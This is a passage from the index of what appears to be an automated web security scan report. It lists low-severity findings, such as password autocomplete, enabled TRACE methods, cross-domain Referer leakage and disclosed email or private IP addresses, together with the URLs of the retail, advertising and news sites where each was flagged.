16.13. http://www.fingerhut.com/js/financial-snapshot.jsp

16.14. http://www.fingerhut.com/js/persistent_cart.jsp

16.15. http://www.fingerhut.com/js/s_code.jsp

16.16. http://www.fingerhut.com/js/scene7/scene7.jsp

16.17. http://www.fingerhut.com/js/sifr.jsp

16.18. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp

16.19. https://www.fingerhut.com/js/persistent_cart.jsp

16.20. https://www.fingerhut.com/js/s_code.jsp

16.21. https://www.fingerhut.com/js/sifr.jsp

16.22. https://www.fingerhut.com/user/login.jsp

16.23. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

16.24. http://www.viddler.com/thumbnail/7d63c65a/

16.25. http://a.tribalfusion.com/j.ad

16.26. http://action.media6degrees.com/orbserv/hbpix

16.27. http://ad.turn.com/server/ads.js

16.28. http://ad.turn.com/server/pixel.htm

16.29. http://ad.yieldmanager.com/imp

16.30. http://ad.yieldmanager.com/pixel

16.31. http://ads.revsci.net/adserver/ako

16.32. http://adserver.veruta.com/track.fcgi

16.33. http://ak1.abmr.net/is/images3.pacsun.com

16.34. http://ak1.abmr.net/is/tag.admeld.com

16.35. http://ak1.abmr.net/is/tag.contextweb.com

16.36. http://ak1.abmr.net/is/www.imiclk.com

16.37. http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A

16.38. http://b.scorecardresearch.com/b

16.39. http://b.scorecardresearch.com/r

16.40. http://bh.contextweb.com/bh/rtset

16.41. http://c7.zedo.com/utils/ecSet.js

16.42. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1

16.43. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1

16.44. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1

16.45. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1

16.46. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1

16.47. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1

16.48. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

16.49. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll

16.50. http://community.petco.com/n/blogs/blog.aspx

16.51. http://community.petco.com/n/pfx/forum.aspx

16.52. http://contextweb-match.dotomi.com/

16.53. http://ctix8.cheaptickets.com/dcssufut800000w4l0d2qm89z_3g4o/dcs.gif

16.54. http://cw-m.d.chango.com/m/cw

16.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

16.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

16.57. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

16.58. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

16.59. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

16.60. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/

16.61. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

16.62. http://data.adsrvr.org/map/cookie/contextweb

16.63. http://disneycruise.disney.go.com/reservations/customize

16.64. http://f.nexac.com/e/a-677/s-2140.xgi

16.65. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH

16.66. http://https.edge.ru4.com/smartserve/ad

16.67. http://i.w55c.net/ping_match.gif

16.68. http://idcs.interclick.com/Segment.aspx

16.69. http://idpix.media6degrees.com/orbserv/hbpix

16.70. http://image2.pubmatic.com/AdServer/Pug

16.71. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

16.72. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

16.73. http://js.revsci.net/gateway/gw.js

16.74. http://leadback.advertising.com/adcedge/lb

16.75. http://media.fastclick.net/w/tre

16.76. http://odb.outbrain.com/utils/get

16.77. http://odb.outbrain.com/utils/ping.html

16.78. http://optimized-by.rubiconproject.com/a/dk.js

16.79. http://p.brilig.com/contact/bct

16.80. http://pix04.revsci.net/D08734/a1/0/0/0.gif

16.81. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js

16.82. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js

16.83. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

16.84. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js

16.85. http://pixel.33across.com/ps/

16.86. http://pixel.invitemedia.com/data_sync

16.87. http://pixel.mathtag.com/event/img

16.88. http://pixel.quantserve.com/pixel

16.89. http://pixel.rubiconproject.com/tap.php

16.90. http://pixel.rubiconproject.com/tap.php

16.91. http://r.openx.net/set

16.92. http://r.turn.com/r/bd

16.93. http://r.turn.com/r/beacon

16.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF

16.95. http://r.turn.com/server/pixel.htm

16.96. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

16.97. http://sales.liveperson.net/hc/46281118/

16.98. http://sales.liveperson.net/hc/53965383/

16.99. http://sales.liveperson.net/hc/71737897/

16.100. http://secureshopping.mcafee.com/

16.101. http://secureshopping.mcafee.com/css/home.css

16.102. http://secureshopping.mcafee.com/css/public.css

16.103. http://secureshopping.mcafee.com/images/banner_arrow.gif

16.104. http://secureshopping.mcafee.com/images/banner_mfes_signup.gif

16.105. http://secureshopping.mcafee.com/images/banner_sa.gif

16.106. http://secureshopping.mcafee.com/images/banner_tp_081610.gif

16.107. http://secureshopping.mcafee.com/images/bgarea_690x250_cccccc.png

16.108. http://secureshopping.mcafee.com/images/btn_compare_up.gif

16.109. http://secureshopping.mcafee.com/images/btn_seeit_up.gif

16.110. http://secureshopping.mcafee.com/images/category_blank.png

16.111. http://secureshopping.mcafee.com/images/category_blank_background.jpg

16.112. http://secureshopping.mcafee.com/images/category_bottom.png

16.113. http://secureshopping.mcafee.com/images/category_top.png

16.114. http://secureshopping.mcafee.com/images/favicon.ico

16.115. http://secureshopping.mcafee.com/images/footer-search-bg.gif

16.116. http://secureshopping.mcafee.com/images/footer-search-left.gif

16.117. http://secureshopping.mcafee.com/images/footer-search-right.gif

16.118. http://secureshopping.mcafee.com/images/logo.gif

16.119. http://secureshopping.mcafee.com/images/nav-menu-bg.gif

16.120. http://secureshopping.mcafee.com/images/nav-menu-left.gif

16.121. http://secureshopping.mcafee.com/images/nav-menu-right.gif

16.122. http://secureshopping.mcafee.com/images/nav-menu-split.gif

16.123. http://secureshopping.mcafee.com/images/nav-menu-tab-bg.gif

16.124. http://secureshopping.mcafee.com/images/nav-menu-tab-left.gif

16.125. http://secureshopping.mcafee.com/images/nav-menu-tab-right.gif

16.126. http://secureshopping.mcafee.com/images/nav-search-bg.gif

16.127. http://secureshopping.mcafee.com/js/core.js

16.128. http://secureshopping.mcafee.com/js/ga_init.js

16.129. http://secureshopping.mcafee.com/js/ga_track_click.js

16.130. http://secureshopping.mcafee.com/js/ga_track_click_init.js

16.131. http://secureshopping.mcafee.com/js/google_ads_7409232867.js

16.132. http://segment-pixel.invitemedia.com/pixel

16.133. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

16.134. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/1/6dbb68f3-e8dc-464d-81c0-091488dbd2b9.P4Avatar.jpg

16.135. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/8/f80cbc5e-6704-417a-b8ad-a6e027a19299.P4Avatar.jpg

16.136. http://sitelife.usatoday.com/ver1.0/Content/images/store/9/9/792de6a9-477b-46db-891e-75ece59c0187.P4Avatar.jpg

16.137. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

16.138. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

16.139. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

16.140. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

16.141. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

16.142. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

16.143. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif

16.144. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

16.145. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

16.146. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png

16.147. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png

16.148. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

16.149. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

16.150. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

16.151. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

16.152. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

16.153. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

16.154. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

16.155. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

16.156. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

16.157. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

16.158. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

16.159. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

16.160. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

16.161. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

16.162. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

16.163. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

16.164. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

16.165. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

16.166. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

16.167. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

16.168. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

16.169. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

16.170. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

16.171. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

16.172. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

16.173. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

16.174. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

16.175. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

16.176. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js

16.177. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

16.178. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css

16.179. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css

16.180. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

16.181. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

16.182. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

16.183. http://sony.tcliveus.com/i

16.184. http://sync.mathtag.com/sync/img

16.185. http://t.invitemedia.com/track_imp

16.186. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros

16.187. http://tag.contextweb.com/TagPublish/getad.aspx

16.188. http://tags.bluekai.com/site/2948

16.189. http://tags.bluekai.com/site/3358

16.190. http://web.aisle7.net/jsapi/1.0/content.js

16.191. http://webtrends.telegraph.co.uk/dcsshgbi400000gscd62rrg43_4o2o/dcs.gif

16.192. http://www.imiclk.com/cgi/r.cgi

16.193. http://www.mcafeesecure.com/ads/1002/25

16.194. https://www.mcafeesecure.com/RatingVerify

16.195. http://www.orbitz.com/favicon.ico

16.196. http://www.passporterboards.com/forums/

16.197. http://www.revresda.com/js.ng/channel=blog&Section=main&adsize=160x600&CookieName=OSC&secure=false&site=orbitz&

16.198. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy

16.199. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

16.200. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

17. Password field with autocomplete enabled

17.1. http://disneycruise.disney.go.com/reservations/customize

17.2. http://localhost:50386/hoyt/Sitefinity/Startup

17.3. http://shoprunner.force.com/content/JsContentElementsGNC

17.4. http://shoprunner.force.com/content/JsContentElementsPET

17.5. https://www.fingerhut.com/user/login.jsp

17.6. http://www.passporterboards.com/forums/

17.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

17.8. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

17.9. http://www.viddler.com/file/7d63c65a/html5mobile/

18. ASP.NET debugging enabled

19. Referer-dependent response

19.1. http://a.tribalfusion.com/j.ad

19.2. http://ad.yieldmanager.com/imp

19.3. http://login.dotomi.com/ucm/UCMController

19.4. http://us.playstation.com/uwps/UsplaystationBlogs

19.5. http://www.facebook.com/plugins/like.php

19.6. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

20. Cross-domain POST

20.1. http://blog.us.playstation.com/

20.2. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/

21. SSL cookie without secure flag set

21.1. https://www.mcafeesecure.com/RatingVerify

21.2. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

22. Cross-domain Referer leakage

22.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel

22.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney

22.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28

22.4. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233

22.5. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

22.6. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45

22.7. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

22.8. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

22.9. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

22.10. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

22.11. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

22.12. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

22.13. http://ad.doubleclick.net/adi/x1.dt/dt

22.14. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

22.15. http://ad.turn.com/server/ads.js

22.16. http://adadvisor.net/adscores/g.js

22.17. http://admeld.adnxs.com/usersync

22.18. http://bh.contextweb.com/bh/drts

22.19. http://bp.specificclick.net/

22.20. http://choices.truste.com/ca

22.21. http://cm.g.doubleclick.net/pixel

22.22. http://cm.g.doubleclick.net/pixel

22.23. http://cm.g.doubleclick.net/pixel

22.24. http://cm.g.doubleclick.net/pixel

22.25. http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250

22.26. http://disneycruise.disney.go.com/reservations/customize

22.27. http://f.nexac.com/e/a-677/s-2140.xgi

22.28. http://f.nexac.com/e/a-677/s-2140.xgi

22.29. http://fls.doubleclick.net/activityi

22.30. http://fls.doubleclick.net/activityi

22.31. http://fls.doubleclick.net/activityi

22.32. http://fls.doubleclick.net/activityi

22.33. http://fls.doubleclick.net/activityi

22.34. http://fls.doubleclick.net/activityi

22.35. http://fls.doubleclick.net/activityj

22.36. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH

22.37. http://googleads.g.doubleclick.net/pagead/ads

22.38. http://googleads.g.doubleclick.net/pagead/ads

22.39. http://googleads.g.doubleclick.net/pagead/ads

22.40. http://googleads.g.doubleclick.net/pagead/ads

22.41. http://googleads.g.doubleclick.net/pagead/ads

22.42. http://googleads.g.doubleclick.net/pagead/ads

22.43. http://googleads.g.doubleclick.net/pagead/ads

22.44. http://googleads.g.doubleclick.net/pagead/ads

22.45. http://googleads.g.doubleclick.net/pagead/ads

22.46. http://googleads.g.doubleclick.net/pagead/ads

22.47. http://serv.adspeed.com/ad.php

22.48. http://sony.links.channelintelligence.com/pages/prices.asp

22.49. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

22.50. http://wow.weather.com/weather/wow/module/USNY0400

22.51. http://www.bhphotovideo.com/bnh/controller/home

22.52. http://www.cruisecritic.com/reviews/cruiseline.cfm

22.53. http://www.facebook.com/plugins/like.php

22.54. http://www.facebook.com/plugins/likebox.php

22.55. http://www.google.com/search

22.56. http://www.google.com/search

22.57. http://www.google.com/search

22.58. http://www.google.com/trends/hottrends

22.59. http://www.imiclk.com/cgi/r.cgi

22.60. http://www.magicalkingdoms.com/blog/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js

22.61. http://www.mcafeesecure.com/Link.sa

22.62. http://www.mcafeesecure.com/Link.sa

22.63. http://www.mcafeesecure.com/Link.sa

22.64. https://www.mcafeesecure.com/RatingVerify

22.65. https://www.mcafeesecure.com/us/legalinfo.jsp

22.66. http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html

22.67. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

22.68. http://www.siteadvisor.com/download/windows.html

22.69. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

22.70. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

22.71. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess

22.72. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy

22.73. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

22.74. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

22.75. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

22.76. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

23. Cross-domain script include

23.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28

23.2. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

23.3. http://ad.turn.com/server/ads.js

23.4. http://blog.us.playstation.com/

23.5. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/

23.6. http://cdn5.tribalfusion.com/media/1956006/frame.html

23.7. http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250

23.8. http://disneycruise.disney.go.com/reservations/customize

23.9. http://fls.doubleclick.net/activityi

23.10. http://fls.doubleclick.net/activityi

23.11. http://fls.doubleclick.net/activityi

23.12. http://googleads.g.doubleclick.net/pagead/ads

23.13. http://googleads.g.doubleclick.net/pagead/ads

23.14. http://googleads.g.doubleclick.net/pagead/ads

23.15. http://i.usatoday.net/_common/_scripts/_oas/google.js

23.16. http://pastebin.com/trends

23.17. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

23.18. http://secureshopping.mcafee.com/

23.19. http://sony.links.channelintelligence.com/pages/prices.asp

23.20. http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

23.21. http://www.cruisecritic.com/reviews/cruiseline.cfm

23.22. http://www.facebook.com/plugins/like.php

23.23. http://www.facebook.com/plugins/likebox.php

23.24. http://www.fingerhut.com/

23.25. https://www.fingerhut.com/user/login.jsp

23.26. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js

23.27. http://www.magicalkingdoms.com/blog/category/disneyland-paris/

23.28. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp

23.29. https://www.mcafeesecure.com/RatingVerify

23.30. https://www.mcafeesecure.com/favicon.ico

23.31. http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html

23.32. http://www.siteadvisor.com/download/windows.html

23.33. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

23.34. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess

23.35. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy

23.36. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

23.37. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

23.38. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

23.39. http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html

23.40. http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html

23.41. http://www.viddler.com/file/7d63c65a/html5mobile/

24. TRACE method is enabled

24.1. http://ads.pubmatic.com/

24.2. http://bh.contextweb.com/

24.3. http://d.xp1.ru4.com/

24.4. http://image2.pubmatic.com/

24.5. http://imawow.weather.com/

24.6. http://login.dotomi.com/

24.7. http://optimized-by.rubiconproject.com/

24.8. http://pixel.rubiconproject.com/

24.9. http://r.openx.net/

24.10. http://secure-us.imrworldwide.com/

24.11. http://track.pubmatic.com/

24.12. http://travel.travelocity.com/

24.13. http://ts.istrack.com/

24.14. http://webassets.scea.com/

24.15. http://widgets.outbrain.com/

24.16. http://wow.weather.com/

24.17. http://www.magicalkingdoms.com/

25. Email addresses disclosed

25.1. http://blog.us.playstation.com/wp-content/themes/twenty11/js/facebox.js

25.2. http://disneycruise.disney.go.com/reservations/customize

25.3. http://i.usatoday.net/_common/_scripts/jquery.cookie.js

25.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js

25.5. http://secureshopping.mcafee.com/

25.6. http://shop.pacsun.com/js_external/PS_external_validation.js

25.7. http://shoprunner.force.com/content/JsContentElementsGNC

25.8. http://shoprunner.force.com/content/JsContentElementsPET

25.9. http://static.bhphotovideo.com/FrameWork/js/common.js

25.10. http://static.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

25.11. http://widgets.outbrain.com/OutbrainRater.js

25.12. http://www.acehardware.com/js/LIB_core.js

25.13. http://www.cruisecritic.com/js/global.js

25.14. http://www.fingerhut.com/js/jquery.cookie.js

25.15. https://www.fingerhut.com/js/jquery.cookie.js

25.16. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js

25.17. http://www.guitarcenter.com/Includes/Guitarcenter/Guitarcenter.css

25.18. http://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js

25.19. http://www.magicalkingdoms.com/blog/category/disneyland-paris/

25.20. http://www.magicalkingdoms.com/blog/wp-content/plugins/jquery-colorbox/js/jquery.colorbox-min.js

25.21. https://www.mcafeesecure.com/us/legalinfo.jsp

25.22. http://www.passporterboards.com/forums/

25.23. http://www.petsmart.com/js/LIB_core.js

25.24. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js

25.25. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js

25.26. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

25.27. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

25.28. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

25.29. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

25.30. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

25.31. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

25.32. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

25.33. http://www.telegraph.co.uk/template/ver1-0/js/jquery.tablesorter.js

25.34. http://www.travelguard.com/WorkArea/java/ektron.js

25.35. http://www.travelguard.com/tgi3/00common/js/tracking/s_code.js

26. Private IP addresses disclosed

26.1. http://api.ak.facebook.com/restserver.php

26.2. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

26.3. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

26.4. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

26.5. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

26.6. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.7. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.9. http://www.facebook.com/extern/login_status.php

26.10. http://www.facebook.com/plugins/like.php

26.11. http://www.facebook.com/plugins/like.php

26.12. http://www.facebook.com/plugins/like.php

26.13. http://www.facebook.com/plugins/like.php

26.14. http://www.facebook.com/plugins/like.php

26.15. http://www.facebook.com/plugins/like.php

26.16. http://www.facebook.com/plugins/like.php

26.17. http://www.facebook.com/plugins/like.php

26.18. http://www.facebook.com/plugins/like.php

26.19. http://www.facebook.com/plugins/like.php

26.20. http://www.facebook.com/plugins/like.php

26.21. http://www.facebook.com/plugins/like.php

26.22. http://www.facebook.com/plugins/like.php

26.23. http://www.facebook.com/plugins/like.php

26.24. http://www.facebook.com/plugins/like.php

26.25. http://www.facebook.com/plugins/like.php

26.26. http://www.facebook.com/plugins/like.php

26.27. http://www.facebook.com/plugins/like.php

26.28. http://www.facebook.com/plugins/like.php

26.29. http://www.facebook.com/plugins/like.php

26.30. http://www.facebook.com/plugins/like.php

26.31. http://www.facebook.com/plugins/like.php

26.32. http://www.facebook.com/plugins/like.php

26.33. http://www.facebook.com/plugins/like.php

26.34. http://www.facebook.com/plugins/like.php

26.35. http://www.facebook.com/plugins/likebox.php

26.36. http://www.google.com/sdch/vD843DpA.dct

26.37. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

26.38. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

26.39. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

26.40. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

27. Robots.txt file

27.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93

27.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/566828221

27.3. http://a.tribalfusion.com/j.ad

27.4. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney

27.5. http://ad.doubleclick.net/ad/N6434.1165.SONY.COM/B4856611.338

27.6. http://ad.turn.com/server/pixel.htm

27.7. http://ahome.disney.go.com/globalelements/chrome.css

27.8. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

27.9. http://api.ak.facebook.com/restserver.php

27.10. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/cw.jsx

27.11. http://b.scorecardresearch.com/b

27.12. http://c7.zedo.com/utils/ecSet.js

27.13. http://cdn.turn.com/server/ddc.htm

27.14. http://cdn5.tribalfusion.com/media/1956006/frame.html

27.15. http://cm.g.doubleclick.net/pixel

27.16. http://content.usatoday.com/asp/usataj/usatajhost.htm

27.17. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

27.18. http://d.xp1.ru4.com/um

27.19. http://dar.youknowbest.com/

27.20. http://data.adsrvr.org/map/cookie/contextweb

27.21. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote

27.22. http://dcl2.wdpromedia.com/concat/4.39.1.5/css

27.23. http://disneycruise.disney.go.com/reservations/customize

27.24. http://feeds.bbci.co.uk/news/rss.xml

27.25. http://feeds.delicious.com/v2/json/urlinfo/data

27.26. http://fingerhut-www.baynote.net/baynote/tags3/common

27.27. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard

27.28. http://fls.doubleclick.net/activityi

27.29. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH

27.30. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/

27.31. http://gs.instantservice.com/geoipAPI.js

27.32. http://https.edge.ru4.com/smartserve/ad

